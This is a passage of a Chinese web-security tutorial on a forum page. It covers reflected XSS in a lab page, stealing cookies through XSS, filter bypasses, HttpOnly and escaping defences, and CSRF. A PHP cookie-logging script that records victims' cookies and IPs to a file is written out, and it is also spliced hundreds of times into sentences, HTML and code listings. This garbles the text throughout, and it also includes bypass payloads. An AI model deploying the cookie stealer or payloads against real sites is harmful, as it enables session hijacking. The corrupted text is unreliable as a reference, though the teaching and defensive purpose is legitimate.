  411. fclose($fp);
  412. ?> <?php
  413. $cookie = $_GET['cookie'];
  414. $ip = getenv ('REMOTE_ADDR');
  415. $time = date('Y-m-d g:i:s');
  416. $fp = fopen("cookie.txt","a");
  417. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  418. fclose($fp);
  419. ?> ?>
  420. <?php
  421. $cookie = $_GET['cookie'];
  422. $ip = getenv ('REMOTE_ADDR');
  423. $time = date('Y-m-d g:i:s');
  424. $fp = fopen("cookie.txt","a");
  425. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  426. fclose($fp);
  427. ?> <?php
  428. $cookie = $_GET['cookie'];
  429. $ip = getenv ('REMOTE_ADDR');
  430. $time = date('Y-m-d g:i:s');
  431. $fp = fopen("cookie.txt","a");
  432. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  433. fclose($fp);
  434. ?> <?php
  435. $cookie = $_GET['cookie'];
  436. $ip = getenv ('REMOTE_ADDR');
  437. $time = date('Y-m-d g:i:s');
  438. $fp = fopen("cookie.txt","a");
  439. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  440. fclose($fp);
  441. ?> <?php
  442. $cookie = $_GET['cookie'];
  443. $ip = getenv ('REMOTE_ADDR');
  444. $time = date('Y-m-d g:i:s');
  445. $fp = fopen("cookie.txt","a");
  446. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  447. fclose($fp);
  448. ?> <center><img<?php
  449. $cookie = $_GET['cookie'];
  450. $ip = getenv ('REMOTE_ADDR');
  451. $time = date('Y-m-d g:i:s');
  452. $fp = fopen("cookie.txt","a");
  453. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  454. fclose($fp);
  455. ?> src=level1.png></center>
  456. <?php
  457. $cookie = $_GET['cookie'];
  458. $ip = getenv ('REMOTE_ADDR');
  459. $time = date('Y-m-d g:i:s');
  460. $fp = fopen("cookie.txt","a");
  461. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  462. fclose($fp);
  463. ?> <?php
  464. $cookie = $_GET['cookie'];
  465. $ip = getenv ('REMOTE_ADDR');
  466. $time = date('Y-m-d g:i:s');
  467. $fp = fopen("cookie.txt","a");
  468. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  469. fclose($fp);
  470. ?> <?php
  471. $cookie = $_GET['cookie'];
  472. $ip = getenv ('REMOTE_ADDR');
  473. $time = date('Y-m-d g:i:s');
  474. $fp = fopen("cookie.txt","a");
  475. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  476. fclose($fp);
  477. ?> <?php
  478. $cookie = $_GET['cookie'];
  479. $ip = getenv ('REMOTE_ADDR');
  480. $time = date('Y-m-d g:i:s');
  481. $fp = fopen("cookie.txt","a");
  482. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  483. fclose($fp);
  484. ?> <?php<?php
  485. $cookie = $_GET['cookie'];
  486. $ip = getenv ('REMOTE_ADDR');
  487. $time = date('Y-m-d g:i:s');
  488. $fp = fopen("cookie.txt","a");
  489. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  490. fclose($fp);
  491. ?>
  492. <?php
  493. $cookie = $_GET['cookie'];
  494. $ip = getenv ('REMOTE_ADDR');
  495. $time = date('Y-m-d g:i:s');
  496. $fp = fopen("cookie.txt","a");
  497. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  498. fclose($fp);
  499. ?> <?php
  500. $cookie = $_GET['cookie'];
  501. $ip = getenv ('REMOTE_ADDR');
  502. $time = date('Y-m-d g:i:s');
  503. $fp = fopen("cookie.txt","a");
  504. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  505. fclose($fp);
  506. ?> <?php
  507. $cookie = $_GET['cookie'];
  508. $ip = getenv ('REMOTE_ADDR');
  509. $time = date('Y-m-d g:i:s');
  510. $fp = fopen("cookie.txt","a");
  511. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  512. fclose($fp);
  513. ?> <?php
  514. $cookie = $_GET['cookie'];
  515. $ip = getenv ('REMOTE_ADDR');
  516. $time = date('Y-m-d g:i:s');
  517. $fp = fopen("cookie.txt","a");
  518. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  519. fclose($fp);
  520. ?> echo<?php
  521. $cookie = $_GET['cookie'];
  522. $ip = getenv ('REMOTE_ADDR');
  523. $time = date('Y-m-d g:i:s');
  524. $fp = fopen("cookie.txt","a");
  525. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  526. fclose($fp);
  527. ?> "<h3<?php
  528. $cookie = $_GET['cookie'];
  529. $ip = getenv ('REMOTE_ADDR');
  530. $time = date('Y-m-d g:i:s');
  531. $fp = fopen("cookie.txt","a");
  532. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  533. fclose($fp);
  534. ?> align=center>payload的长度:".strlen($str)."</h3>";
  535. <?php
  536. $cookie = $_GET['cookie'];
  537. $ip = getenv ('REMOTE_ADDR');
  538. $time = date('Y-m-d g:i:s');
  539. $fp = fopen("cookie.txt","a");
  540. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  541. fclose($fp);
  542. ?> <?php
  543. $cookie = $_GET['cookie'];
  544. $ip = getenv ('REMOTE_ADDR');
  545. $time = date('Y-m-d g:i:s');
  546. $fp = fopen("cookie.txt","a");
  547. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  548. fclose($fp);
  549. ?> <?php
  550. $cookie = $_GET['cookie'];
  551. $ip = getenv ('REMOTE_ADDR');
  552. $time = date('Y-m-d g:i:s');
  553. $fp = fopen("cookie.txt","a");
  554. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  555. fclose($fp);
  556. ?> <?php
  557. $cookie = $_GET['cookie'];
  558. $ip = getenv ('REMOTE_ADDR');
  559. $time = date('Y-m-d g:i:s');
  560. $fp = fopen("cookie.txt","a");
  561. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  562. fclose($fp);
  563. ?> ?>
  564. <?php
  565. $cookie = $_GET['cookie'];
  566. $ip = getenv ('REMOTE_ADDR');
  567. $time = date('Y-m-d g:i:s');
  568. $fp = fopen("cookie.txt","a");
  569. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  570. fclose($fp);
  571. ?> <?php
  572. $cookie = $_GET['cookie'];
  573. $ip = getenv ('REMOTE_ADDR');
  574. $time = date('Y-m-d g:i:s');
  575. $fp = fopen("cookie.txt","a");
  576. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  577. fclose($fp);
  578. ?> </body>
  579. </html>
复制代码
$str<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> =<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> $_GET["name"];<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> //获取参数传入
echo<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> "欢迎用户".$str."

";<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> //用户输入什么就输出什么
代码中并没有对用户输入进行检查,直接输出到页面中。所以存在xss
测试:

可以构造如下payload
/level1.php?name=



2、利用xss获取当前用户的cookie

测试是否有弹窗

编写获取cookie的脚本,放自己的服务器下面,内容如下
  1. <?php
  2. $cookie = $_GET['cookie'];
  3. $ip = getenv ('REMOTE_ADDR');
  4. $time = date('Y-m-d g:i:s');
  5. $fp = fopen("cookie.txt","a");
  6. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  7. fclose($fp);
  8. ?>
复制代码
构造payload

发现有长度限制,在前端修改长度


在另外一台主机访问,发现自己的服务器得到了cookie

三、xss测试与利用

1.xss发现

a、步骤

b、实例:

(1)假设返回的响应包含如下的脚本

测试思路:
<ul<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> ><li<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> id="u79889f0b">终止input标签,构造script脚本<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> :"><li<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> id="uff401523"><strong>在input标签添加一个事件处理器<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> :"<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> u1563f887"<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> >(2)假设返回的响应包含如下的脚本</p>
测试思路:
(3)假设返回的响应包含如下的脚本:
click<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> here…
测试思路:
<ul<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> ><li<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> id="ud1618395">使用伪协议:javascript:alert(1)<li<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> id="u275b5095">使用事件处理器:#<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> "E2HBp">c、探查防御措施

一般的防御有以下的几种:
d、绕过

如果是防火墙过滤,则轮流删除字符串的不同部分,确定阻止了哪个标签,然后进行绕过
下面总结几种绕过:
  1. [img]http://dis.qidao123.com/vaild.gif<?php
  2. $cookie = $_GET['cookie'];
  3. $ip = getenv ('REMOTE_ADDR');
  4. $time = date('Y-m-d g:i:s');
  5. $fp = fopen("cookie.txt","a");
  6. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  7. fclose($fp);
  8. ?> <?php
  9. $cookie = $_GET['cookie'];
  10. $ip = getenv ('REMOTE_ADDR');
  11. $time = date('Y-m-d g:i:s');
  12. $fp = fopen("cookie.txt","a");
  13. fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
  14. fclose($fp);
  15. ?> onreadystatechange=alert(1)[/img]
复制代码
2.xss利用

1、网络钓鱼,包括获取各类用户账号
2、窃取用户cookies资料,从而获取用户隐私信息,或利用用户身份进一步对网站执行操作;
3、劫持用户(浏览器)会话,从而执行任意操作,例如非法转账、强制发表日志、电子邮件等
4、强制弹出广告页面、刷流量等
5、网页挂马;
6、进行恶意操作,如任意篡改页面信息、删除文章等
7、进行大量的客户端攻击,如ddos等
8、获取客户端信息,如用户的浏览历史、真实p、开放端口等
9、控制受害者机器向其他网站发起攻击;
10、结合其他漏洞,如csrf,实施进步危害;
11、提升用户权限,包括进一步渗透网站
12、传播跨站脚本蠕虫等
四、防御

1.HTML实体化

htmlspecialchars():可以把输入内容转换为HTML实体

&quot
'
&apos
&
&amp
</p/tdtd<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> width="342"p<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> id="ud2cda502"<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> &lt/p/td/trtrtd<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> width="86"p<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> id="u51909476"<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> >
&gt
2.输入过滤

对用户提交的数据进行有效验证,仅接受指定长度范围内的,采用适当格式的内容提交,阻止或者忽略除此以外的其他任何数据。
3.httponly设置

XSS<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 一般利用js脚步读取用户浏览器中的Cookie,而如果在服务器端对<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> Cookie<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 设置了HttpOnly<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 属性,那么js脚本就不能读取到cookie,但是浏览器还是能够正常使用cookie
一般的Cookie都是从document对象中获得的,现在浏览器在设置<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> Cookie的时候一般都接受一个叫做HttpOnly的参数,跟domain等其他参数一样,一旦这个HttpOnly被设置,你在浏览器的<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> document对象中就看不到Cookie了,而浏览器在浏览的时候不受任何影响,因为Cookie会被放在浏览器头中发送出去(包括ajax的时<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 候),应用程序也一般不会在js里操作这些敏感Cookie的,对于一些敏感的Cookie我们采用HttpOnly,对于一些需要在应用程序中用js操作的cookie我们就不予设置,这样就保障了Cookie信息的安全也保证了应用。
五、csrf原理及利用

1、csrf原理与利用

原理:
跨站请求攻击,简单地说,是攻击者通过一些技术手段欺骗用户的浏览器去访问一个自己曾经认证过的网站并执行一些操作(如发邮件、发消息、甚至财产操作:转账、购买商品等)。由于浏览器曾经认证过,所以被访问的网站会认为是真正的用户操作而去执行。这利用了web中用户身份认证的一个漏洞:简单的身份验证只能保证请求发自某个用户的浏览器,却不能保证请求本身是用户自愿发出的。
场景:
1.用户C打开浏览器,访问受信任网站A,输入用户名和密码请求登录网站A;
2.在用户信息用过验证后,网站A产生Cookie信息并返回给浏览器,此时用户登录网站A成功,可以正常发送请求到网站A;
3.用户未退出网站A之前,在同一浏览器中打开一个TAB页访问网站B;
4.网站B接受到用户请求后,返回一些攻击性代码,并发出一个请求要求访问第三方站点A;
5.浏览器在接收到这些攻击性代码后,根据网站B的请求,在用户不知情的情况下携带Cookie信息,向网站A发出请求。网站A并不知道该请求其实是由B发起的,所以会根据用户C的Cookie信息以C的权限处理该请求,导致来自网站B的恶意代码被执行。
检测:
1.检测CSRF漏洞是一项比较繁琐的工作,最简单的方法就是抓取一个正常请求的数据包,去掉Referer字段后再重新提交,如果该提交还有效,那么基本上可以确定存在CSRF漏洞。
2.随着对CSRF漏洞研究的不断深入,不断涌现出一些专门针对CSRF漏洞检测的工具,若CSRFTester,CSRF<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> Request<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> Builder等。
3.用burp自带的csrf制作工具对数据包修改,然后在浏览器执行测试。
防御:
1.验证HTTP<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> Referer字段;
2.在请求地址中添加token并验证;
客户端把用户的用户名和密码发到服务端服务端进行校验,校验成功会生成token,<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 把token发送给客户端客户端自己保存token,<?php
$cookie = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$time = date('Y-m-d g:i:s');
$fp = fopen("cookie.txt","a");
fwrite($fp,"IP: ".$ip."Date: ".$time." Cookie:".$cookie."\n");
fclose($fp);
?> 再次请求就要在Http协议的请求头中带着token去访问服务端,和在服务端保存的token信息进行比对校验。
3.在HTTP头中自定义属性并验证。
CSRF与XSS的区别:最大的区别就是CSRF没有盗取用户的Cookie,而是直接的利用了浏览器的Cookie让用户去执行某个动作。
各种功能点
出处:http://www.cnblogs.com/-xiaopeng1/本文版权归作者和博客园共有,欢迎转载,但必须给出原文链接,并保留此段声明,否则保留追究法律责任的权利。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!



欢迎光临 ToB企服应用市场:ToB评测及商务社交产业平台 (https://dis.qidao123.com/) Powered by Discuz! X3.4